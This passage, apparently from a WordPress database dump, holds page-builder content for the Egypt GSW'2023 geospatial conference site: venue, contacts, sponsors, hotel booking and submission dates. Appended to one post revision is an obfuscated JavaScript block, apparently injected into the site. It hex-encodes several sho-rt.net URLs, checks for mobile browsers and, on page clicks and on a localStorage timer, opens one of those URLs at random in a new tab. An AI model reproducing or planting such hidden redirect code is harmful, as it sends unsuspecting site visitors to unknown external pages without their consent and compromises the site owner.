!important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377261106{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the <strong>Arab Academy for Science, Technology, and Maritime Transport (AASTMT)</strong> is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the <strong>InterContinental Cairo Semiramis Cairo</strong>, <strong>Egypt</strong>. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 02:34:58','2023-05-18 02:34:58','',3066,'https://gsw2023.com/?p=4548',0,'revision','',0),
(4549,1,'2023-05-18 02:38:14','2023-05-18 02:38:14','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" 